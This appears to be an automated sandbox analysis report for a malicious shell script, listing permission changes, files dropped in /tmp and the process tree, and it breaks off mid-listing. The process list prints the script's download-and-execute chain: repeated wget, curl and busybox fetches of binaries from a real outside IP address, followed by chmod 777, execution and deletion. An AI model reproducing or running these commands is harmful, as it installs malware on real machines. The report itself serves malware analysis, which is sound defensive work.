Analysis Overview
SHA256
bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb
Threat Level: Shows suspicious behavior
The file bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-21 08:15
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-21 08:15
Reported
2024-11-21 08:17
Platform
ubuntu1804-amd64-20240729-en
Max time kernel
32s
Max time network
131s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB | /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB | N/A |
| N/A | /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx | /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx | N/A |
| N/A | /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo | /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo | N/A |
| N/A | /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 | /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 | N/A |
| N/A | /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X | /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X | N/A |
| N/A | /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l | /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l | N/A |
| N/A | /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc | /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc | N/A |
| N/A | /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv | /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv | N/A |
| N/A | /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc | /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc | N/A |
| N/A | /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq | /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq | N/A |
| N/A | /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ | /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ | N/A |
| N/A | /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e | /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e | N/A |
| N/A | /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t | /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t | N/A |
| N/A | /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 | /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 | N/A |
| N/A | /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc | /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc | N/A |
| N/A | /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq | /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq | N/A |
| N/A | /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ | /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ | N/A |
| N/A | /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e | /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e | N/A |
| N/A | /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t | /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t | N/A |
| N/A | /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 | /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 | N/A |
| N/A | /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB | /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB | N/A |
| N/A | /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx | /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx | N/A |
| N/A | /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo | /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo | N/A |
| N/A | /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 | /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 | N/A |
| N/A | /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X | /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X | N/A |
| N/A | /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l | /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l | N/A |
| N/A | /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc | /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc | N/A |
| N/A | /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv | /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 | /usr/bin/curl | N/A |
Processes
/tmp/bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh
[/tmp/bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/bin/chmod
[chmod 777 aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
[./aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/bin/rm
[rm aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/usr/bin/wget
[wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/bin/chmod
[chmod 777 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
[./6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/bin/rm
[rm 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/usr/bin/wget
[wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/bin/chmod
[chmod 777 uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
[./uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/bin/rm
[rm uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/usr/bin/wget
[wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
/bin/chmod
[chmod 777 d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
/tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
[./d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
/bin/rm
[rm d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
/usr/bin/wget
[wget http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]
/bin/chmod
[chmod 777 sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]
/tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X
[./sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]
/bin/rm
[rm sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]
/usr/bin/wget
[wget http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]
/bin/chmod
[chmod 777 0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]
/tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l
[./0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]
/bin/rm
[rm 0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]
/usr/bin/wget
[wget http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]
/bin/chmod
[chmod 777 TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]
/tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc
[./TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]
/bin/rm
[rm TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]
/usr/bin/wget
[wget http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]
/bin/chmod
[chmod 777 yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]
/tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv
[./yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]
/bin/rm
[rm yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]
/usr/bin/wget
[wget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]
/bin/chmod
[chmod 777 xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]
/tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
[./xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]
/bin/rm
[rm xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]
/usr/bin/wget
[wget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]
/bin/chmod
[chmod 777 mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]
/tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
[./mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]
/bin/rm
[rm mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]
/usr/bin/wget
[wget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]
/bin/chmod
[chmod 777 KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]
/tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
[./KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]
/bin/rm
[rm KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]
/bin/chmod
[chmod 777 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]
/tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
[./1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]
/bin/rm
[rm 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]
/usr/bin/wget
[wget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]
/bin/chmod
[chmod 777 jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]
/tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
[./jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]
/bin/rm
[rm jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]
/usr/bin/wget
[wget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]
/bin/chmod
[chmod 777 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]
/tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
[./6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]
/bin/rm
[rm 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]
/usr/bin/wget
[wget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]
/bin/chmod
[chmod 777 xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]
/tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
[./xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]
/bin/rm
[rm xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]
/usr/bin/wget
[wget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]
/bin/chmod
[chmod 777 mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]
/tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
[./mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]
/bin/rm
[rm mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]
/usr/bin/wget
[wget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]
/bin/chmod
[chmod 777 KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]
/tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
[./KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]
/bin/rm
[rm KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]
/bin/chmod
[chmod 777 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]
/tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
[./1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]
/bin/rm
[rm 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]
/usr/bin/wget
[wget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]
/bin/chmod
[chmod 777 jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]
/tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
[./jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]
/bin/rm
[rm jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]
/usr/bin/wget
[wget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]
/bin/chmod
[chmod 777 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]
/tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
[./6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]
/bin/rm
[rm 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]
/usr/bin/wget
[wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/bin/chmod
[chmod 777 aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
[./aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/bin/rm
[rm aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/usr/bin/wget
[wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/bin/chmod
[chmod 777 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
[./6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/bin/rm
[rm 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/usr/bin/wget
[wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/bin/chmod
[chmod 777 uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
[./uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/bin/rm
[rm uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/usr/bin/wget
[wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
/bin/chmod
[chmod 777 d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
/tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
[./d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
/bin/rm
[rm d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
/usr/bin/wget
[wget http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]
/bin/chmod
[chmod 777 sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]
/tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X
[./sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]
/bin/rm
[rm sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]
/usr/bin/wget
[wget http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]
/bin/chmod
[chmod 777 0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]
/tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l
[./0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]
/bin/rm
[rm 0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]
/usr/bin/wget
[wget http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]
/bin/chmod
[chmod 777 TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]
/tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc
[./TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]
/bin/rm
[rm TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]
/usr/bin/wget
[wget http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]
/usr/bin/curl
